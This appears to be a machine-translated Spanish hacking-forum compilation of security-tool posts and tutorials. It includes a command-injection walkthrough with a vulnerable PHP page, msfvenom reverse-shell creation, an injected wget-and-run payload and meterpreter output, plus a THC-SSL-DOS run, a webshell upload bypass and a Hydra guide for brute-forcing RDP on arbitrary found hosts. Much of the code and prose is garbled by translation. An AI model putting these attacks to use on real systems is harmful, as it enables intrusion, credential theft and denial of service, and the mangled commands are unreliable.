iScanner es una herramienta gratuita de código abierto que detecta y elimina códigos maliciosos (iframes sospechosos, ofuscado, el uso de javascript peligroso eval y escapar, ...) en las páginas web.

Esta herramienta ha sido programada por iSecur1ty usando un lenguaje de programación de Ruby.

Su Uso es el siguiente:

Primero descargamos la Herramienta:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Luego vamos al directorio en mi caso Escritorio : cd /Desktop/iscanner-0.7

. / iScanner [opciones]


-R, - distancia [URL]
Escanear página web remoto / sitio web
-F, - file [ARCHIVO]
Escanear un archivo específico
-F, - carpeta [directorio]
Analizar una carpeta específica
-E, - extensiones [ext: ext: ext]
Las extensiones que desea analizar
-D, - base de datos [base de datos]
Seleccione el archivo de base de datos
-M, - malware [ARCHIVO]
Escanear un código de malware específico
-O, - output [LOG-FILE]
Salida de archivo de registro
-M, - correo electrónico [EMAIL-DIRECCIÓN]
Enviar el informe a la dirección de correo electrónico
-C, - limpio [LOG-FILE]
Limpiar los archivos infectados
-B, - copia de seguridad
Copia de seguridad de archivos infectados
-R, - restauración [BACKUP-FOLDER]
Restaurar los archivos infectados
-A, - auto-limpieza
Activar el modo de limpieza automática
-D, - debug
Activar el modo de depuración
-Q, - quiet
Activar el modo silencioso
-S, - enviar [malicioso ARCHIVO]
Enviar archivo malicioso para los análisis
-U, - update
Actualizar a la última versión iScanner
-U, - update-db
Actualización de la base de datos de firmas sólo
-V, - version
Imprime el número de versión
-H, - help
Mostrar este mensaje

Tambien podemos instalarlo y acceder mediante consola en /etc/iscanner/ con el comando ./installer -i

Imagenes:

Introducción

Descripción

En este tutorial, aprenderás cómo tomar el control de un servidor que es vulnerable a una vulnerabilidad de inyección de comandos.
Medio ambiente

El siguiente tutorial ha sido probado en el siguiente entorno:
atacante:
Dirección IP: 192.168.1.43
Distribución: BackTrack 5 R3
objetivo
Dirección IP: 192.168.1.16
Distribución: Debian 6
Ejemplo

Código

<html>
<head>
<title> ping host </ title>
</ Head>
<body>
<form method="get" action="">
  <input type="text" /> name="host"
  <input type="submit" value="ping host" />
</ Form>
<? Php
if (isset ($ _GET ['host'])) {
  $ Salida = shell_exec ("ping-c1" $ _GET ['host'].);
  echo "<pre> $ salida </ pre>";
}
?>
</ Body>
</ Html>

El uso normal

En el uso normal, esta aplicación se supone para generar el resultado del comando ping contra un host solicitado:

Vulnerabilidad

Este código es vulnerable, ya que no desinfectar las entradas del usuario. Es posible inyectar otros comandos:

Explotación

Crear shell con msfvenom
Vamos a aprovechar esta vulnerabilidad para descargar un shell inversa PHP. Pero en primer lugar crear el shell con msfvenom :
root @ bt: ~ # msfvenom-p php / meterpreter / reverse_tcp-f lhost prima = 192.168.1.43 lport = 4050> / var / www / shell.txt
root @ bt: ~ # cabeza / var / www / shell.txt
# <? Php

error_reporting (0);
# El controlador de carga sobrescribirá con el lhost correcto antes de enviar
# A la víctima.
$ Ip = '192 .168.1.43 ';
$ Port = 4050;
$ Ipf = AF_INET;

si (== FALSE strpos ($ ip,! ":")) {
Como se puede ver, la primera línea está comentada. Vamos a quitar el comentario:
root @ bt: ~ # sed-i '¡¯ s / # <php / <php /' / var / www / shell.txt
Iniciar servidor web en la máquina del atacante
Aunque sería posible alojar nuestro shell PHP en una tercera parte, es conveniente en nuestro tutorial de ser el anfitrión de la máquina del atacante directamente. Vamos a comenzar nuestro servidor web:
root @ bt: ~ # servicio apache2 inicio
* Inicio del servidor web apache2 [OK]
Comience escuchando en el puerto 4050 de la máquina del atacante
De BT5, abramos nuestro oyente:
root @ bt: ~ # msfconsole
msf> use multi / handler
exploit msf (manejador)> set payload php / meterpreter / reverse_tcp
msf exploit (manejador)> set lhost 192.168.1.43
msf exploit (manejador)> set lport 4050
msf exploit (manejador )> explotar

• Started inversa controlador en 192.168.1.43:4050
  
• A partir del controlador de carga útil ...
  Descarga shell desde el host vulnerable
  Vamos a aprovechar la vulnerabilidad y descargar el shell del servidor web del atacante. Escriba el siguiente comando en el campo "máquina":
  ; You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login wget-O / tmp / shell.php; php-f / tmp / shell.php
  El comando anterior descarga shell.txt como shell.php en el directorio / tmp y ejecutar el shell php (php-f / tmp / shell.php)
  Pruebe el shell inversa
  Ahora tenemos un meterpreter:
  ...
  
• Envío etapa (38791 bytes) para 192.168.1.16
  
• Periodo de sesiones Meterpreter 1 abierto (192.168.1.43:4050 -> 192.168.1.16:40107) en 05/05/2012 21:02:34 -0400
  
  meterpreter> sysinfo
  Equipo: snort
  OS: Linux snort 2.6.32-5-686 # 1 SMP Lun Ene 16 16:04:25 UTC 2012 i686
  Meterpreter: php / php
  meterpreter> shell
  Proceso 3845 creado.
  Canal creado 0.
  / Sbin / ifconfig
  eth0 Link a encap: Ethernet HWaddr 00:0 c: 29:97:32:0 f 
            inet addr: 192.168.60.129 Bcast: 192.168.60.255 Máscara: 255.255.255.0
            inet6 addr: fe80 :: 20c: 29ff: fe97: 320f/64 Alcance: Enlace
            UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1
            RX packets: 530 errors: 0 caído: 0 sobrecostos: 0 frame: 0
            TX paquetes: 285 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
            colisiones: 0 txqueuelen: 1000
            RX bytes: 62923 (61.4 KiB) TX bytes: 31150 (30.4 KiB)
            Interrupción: 19 Dirección base: 0x2000
  
  eth1 Enlace encap: Ethernet HWaddr 00:0 c: 29:97:32:19 
            inet addr: 192.168.1.16 Bcast: 192.168.1.255 Máscara: 255.255.255.0
            inet6 addr: 2a01: e35: 8b15: 3430:20 c: 29ff: fe97: 3219/64 Scope: Global
            inet6 addr: fe80 :: 20c: 29ff: fe97: 3219/64 Alcance: Vínculo
            UP BROADCAST RUNNING MULTICAST MTU: 1500 Métrica: 1
            RX packets: 9694 errors: 0 caído: 0 sobrecostos: 0 frame: 0
            TX paquetes: 3451 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
            colisiones: 0 txqueuelen: 1000
            RX bytes: 2119587 (2,0 MiB) TX bytes: 1297681 (1.2 MiB)
            Interrupción: 16 Dirección base: 0x2080
  
  lo Link encap: Bucle local 
            inet addr: 127.0.0.1 Máscara: 255.0.0.0
            inet6 ::: 1/128 Alcance: Anfitrión
            ARRIBA LOOPBACK RUNNING MTU: 16436 Metric: 1
            RX packets: 2597 errors: 0 caído: 0 sobrecostos: 0 frame: 0
            TX paquetes: 2597 errores: 0 caído: 0 sobrecostos: 0 carrier: 0
            colisiones: 0 txqueuelen: 0
            RX bytes: 365075 (356.5 KiB) TX bytes: 365075 (356.5 Kb)
  
  Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  
  Observa Mejor el Post Aqui : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  

CAT está diseñado para facilitar la aplicación manual web para pruebas de penetración más complejos y exigentes tareas de la aplicación de prueba. Se elimina algunos de los elementos más repetitivas del proceso de prueba, permitiendo que el tester para centrarse en aplicaciones individuales, lo que les permite llevar a cabo una prueba mucho más completa.

COMPONENTES CLAVE

CAT ofrece características que permiten una amplia variedad de métodos de prueba que llevará a cabo:

Repetidor Request - Se usa para repetir una única solicitud
Proxy - Classic apoderado Inline
Fuzzer - Permite lote de pruebas que se envía a un servidor de ataques de fuerza bruta fuzzing parámetro, navegación forzada, etc
Iniciar sesión - Ver una lista de peticiones a clase, etc repita búsqueda Permite una secuencia de solicitudes que se repiten y modificados.
Autenticación Checker - Dos sincronizado proxies que pueden ser utilizados para comprobar los controles de autenticación y autorización.
SSL Checker - Solicitar una página específica con diversos sistemas de cifrado SSL y versiones.
Bloc de notas - Un editor de texto / RTF que se puede utilizar como un bloc de notas para las conversiones etc
Web Browser - Un navegador web integrado con proxy pre-configurada sobre la base de motor de renderización del Explorador de Internet.
Addons - libre acceso API / SDK para extender CAT con funcionalidades adicionales.

Imagenes de la Tool en Windows:

Interfaz :

Auto Tester:

Callab:

Proxy:

Web Oficial: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descarga:

http://www.contextis.com/files/cat-mono-v1.tar.gz

Con la herramienta Pytbull puede asegurarse que sus IDS / IPS detecta y bloquea el tráfico no deseado es probarlo con cargas útiles y herramientas específicas.

Suministra cerca de 300 pruebas agrupadas en 9 módulos de prueba:
clientSideAttacks: este módulo utiliza un shell inversa para proporcionar el servidor con instrucciones para descargar archivos maliciosos remotos. Este módulo comprueba la capacidad de los IDS / IPS para proteger contra ataques del lado del cliente.
testRules: Pruebas de reglas básicas. Estos ataques se supone para ser detectados por las Normas se envían con los IDS / IPS.
badTraffic: no compatibles con RFC paquetes se envían al servidor para probar cómo se procesan los paquetes.
fragmentedPackets: varias cargas útiles fragmentados se envían al servidor para comprobar su capacidad para recomponer y detectar los ataques.
multipleFailedLogins: pruebas de la capacidad del servidor para rastrear varios inicios de sesión fallidos (por ejemplo, FTP). Hace uso de reglas personalizadas en Snort y Suricata.
evasionTechniques: varias técnicas de evasión se utilizan para comprobar si los IDS / IPS puede detectar.
shellcodes: enviar shellcodes diferentes para el servidor en el puerto 21/tcp para poner a prueba la capacidad del servidor para detectar / rechazar shellcodes.
denialOfService: pone a prueba la capacidad de los IDS / IPS para proteger contra los intentos de denegación de servicio
pcapReplay: permite reproducir archivos pcap

Es fácilmente configurable y puede integrar nuevos módulos en el futuro.

Hay básicamente 6 tipos de pruebas:

socket: abrir un socket en un puerto determinado y enviar las cargas útiles para el destino remoto en ese puerto.
comando: enviar comandos al destino remoto con el You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login () de Python.
scapy: enviar cargas útiles especiales elaborados sobre la base de la sintaxis Scapy
varios inicios de sesión fallidos: abrir un socket en el puerto 21/tcp (FTP) y tratar de iniciar sesión con credenciales de 5 veces malas.
ataques del lado del cliente: utilizar un shell inversa en el destino remoto y enviar comandos al mismo para que sean procesados ​​por el servidor (normalmente comandos de wget).
repetición pcap: permite reproducir el tráfico basado en archivos pcap

Probando la Herramienta en Backtrack :






Mas Informacion :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descarga:

http://sourceforge.net/projects/pytbull/files/pytbull-2.0.tar.bz2/download?use_mirror=ufpr

PD: las img. se ven mas grandes en mi blog : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login mismo tema, saludos

_____________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/

THC-SSL-DOS es una herramienta para comprobar el rendimiento de SSL. THC-SSL-DOS explota esta característica asimétrica sobrecargando el servidor y lo derriba de Internet. Este problema afecta a todas las implementaciones de SSL en la actualidad. Los vendedores son conscientes de este problema desde el año 2003 y el tema ha sido discutido ampliamente.

Uso : cd Desktop
         cd thc-ssl-dos-1.4
         cd src
         configure
         make install

Ej: 443/tcp  open   ssl/http   Apache httpd

./thc-ssl-dos 127.3.133.7 443 --accept
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

ARPwner es una herramienta para hacer envenenamiento ARP y ataques de envenenamiento de DNS, con una interfaz gráfica de usuario simple y un sistema de plugins para hacer el filtrado de la información recopilada, también tiene una implementación de sslstrip y se codifica 100% en python y en Github, así que usted puede modificar de acuerdo a sus necesidades.

Bueno para instalar esta herramienta lo primero que debemos hacer es poner en Consola

apt-get install python-pypcap


(yo ya lo tenia instalado xd)

Luego descargamos la tool: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Luego de eso, vamos a la ruta del archivo y lo ejecutamos : python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Vamos a ARP y activamos las opciones : DNS spoofing, Pasive Sniifing (dependiendo de lo que necesitemos) lo activamos dandole un Click y veran que abajo dice ON.

Luego Network Scan y agregamos los rangos de Ip para la realizacion del scan.


Fuente : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Saludos

yo tengo instalada la version de Python 2.6.5
Supongo que en la version 3 debe correr tambien 

Esta herramienta nos sirve para buscar un tipo de archivo específico en un determinado dominio, su uso : Vamos a la carpeta en mi caso

cd Desktop
cd goofilev1.5

uso : ./goofile.py  - d You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login - f  (extension del archivo "php txt pdf"...



Entrega 2 resultados , probamos los 2 y en el segundo 404.php..



Descarga : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos y Disfruten

Patator es un multi-propósito de fuerza bruta, con un diseño modular y un uso flexible.

su uso: cd Desktop
            python patator_v0.3.py
            ./patator.py module --help

Contiene los siguientes Modulos:
+ ftp_login     : Brute-force FTP authentication
  + ssh_login     : Brute-force SSH authentication
  + telnet_login  : Brute-force Telnet authentication
  + smtp_login    : Brute-force SMTP authentication
  + smtp_vrfy     : Enumerate valid users using SMTP VRFY
  + smtp_rcpt     : Enumerate valid users using SMTP RCPT TO
  + http_fuzz     : Fuzz HTTP/HTTPS
  + pop_passd     : Brute-force poppassd authentication (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login not POP3)
  + smb_login     : Brute-force SMB authentication
  + ldap_login    : Brute-force LDAP authentication
  + mssql_login   : Brute-force MSSQL authentication
  + oracle_login  : Brute-force Oracle authentication
  + mysql_login   : Brute-force MySQL authentication
  + pgsql_login   : Brute-force PostgreSQL authentication
  + vnc_login     : Brute-force VNC authentication
  + dns_reverse   : Reverse lookup subnets
  + dns_forward   : Forward lookup subdomains
  + snmp_login    : Brute-force SNMP v1/2/3 authentication
  + unzip_pass    : Brute-force the password of encrypted ZIP files
  + keystore_pass : Brute-force the password of Java keystore files



Descarga: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Adminator Tools es una herramienta con la que podrán obtener información
muy importante a la hora de ejecutar pruebas de penetración, entre sus opciones
esta:

   :whoisip => Busqueda de Informacion, mediante la direccion IP
   :whoisdomain => Informacion general del dominio
   :portscanner => Escaneo de puertos (TIPO NMAP)
   :intelligence => Obtencion de datos (servidor web, sistema operativo, etc...)
   :subdomain => Obtencion de los SubDominios de un Sitio web
   :admin => Exelente Admin Finder
   :fuzzer => Fuzzer HTTP

Modo de Uso :

cd adminator (directorio)
chmod 777 You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (permisos 777 "all permissions")
./adminator.py
:usage (+opciones disponibles)




Sin mas que decir el enlace de descarga :
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno en este tutorial mostrare como realizar un bypass con un upload de imágenes  mediante la administracion del sitio, el sitio web tenia vulnerabilidades de injeccion, fue penetrado y bueno ya verán    como prosigue en el video tutorial.

Herramienta Mozilla Live Http Headers: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Descarga Shell: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Descarga Shell (extension .JPG): You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno tal como dice el titulo, mostrare como crackear Id y Pass de Escritorios remotos, mediante el puerto 3389 (puerto desktop remote), Protocolo RDP, Hydra y nuestro diccionario de Administradores y Passoword.

Bueno Hydra no solo nos puede servir para el crackeo de Escritorio Remotos, si no tambien para muchos otros, entre su amplio repertorio de Protocolos disponibles, encontramos algunos como : FTP, MSSQL, MYSQL, TELNET, VNC y muchos otros.

Empezando con el tutorial abriremos nuestra herramienta en backtrack 5 en la siguiente Ruta:

Aplicaciones - Backtrack - Privilage Escalation - Passwords Atacks - Online Atacks - Hydra-gtk
Una vez selecionada la herramienta, tendremos lo siguiente:


Bueno tenemos la herramienta abierta, una vez lista comenzamos a buscar primero una Ip con Escritorio Remoto, luego de eso la Introducimos en "Single Target"

Seguidamente elegimos el port o puerto, en este caso 3389, o si fuera ftp puerto 21 o asi etc. en este caso el uso es 3389.

Luego Marcamos la opcion "Be Verbose" y "Show Attempts" y nos vamos a la pestaña "PASSWORDS"


Bueno ahora seleccionamos "Username List" y vamos en busca de Nuestro diccionario

Diccionario
Administrator
Administrador
Admin


Creamos una nota de texto qe contenga esos 3 "ADM" y lo agregamos, cuando le damos a "username list" nos abrira un explorador y seleccionamos el que les dije hace un momento,

Luego de eso el mas importante el Passoword List, si uds. tiene su propio Diccionario de Passwords en .txt usenlo yo les dejare algo de muestra:

Ejemplo de Diccionario Password.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Bueno este es solo de ejemplo porque el que yo tengo tiene miles mas, se los dejare aunque puede que el crakeo se torne muy largo por la cantidad, pero si llega a crackear la pass el resultado es grandioso

Passowords.txt : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Como dije pesa Bastante, asi que evaluen la posibilidad de buscar el suyo o uno mas corto

Luego de haber seleccionado los 2 .txt (adm - pass) vamos a pestaña Start y le damos Start y empezara a crackear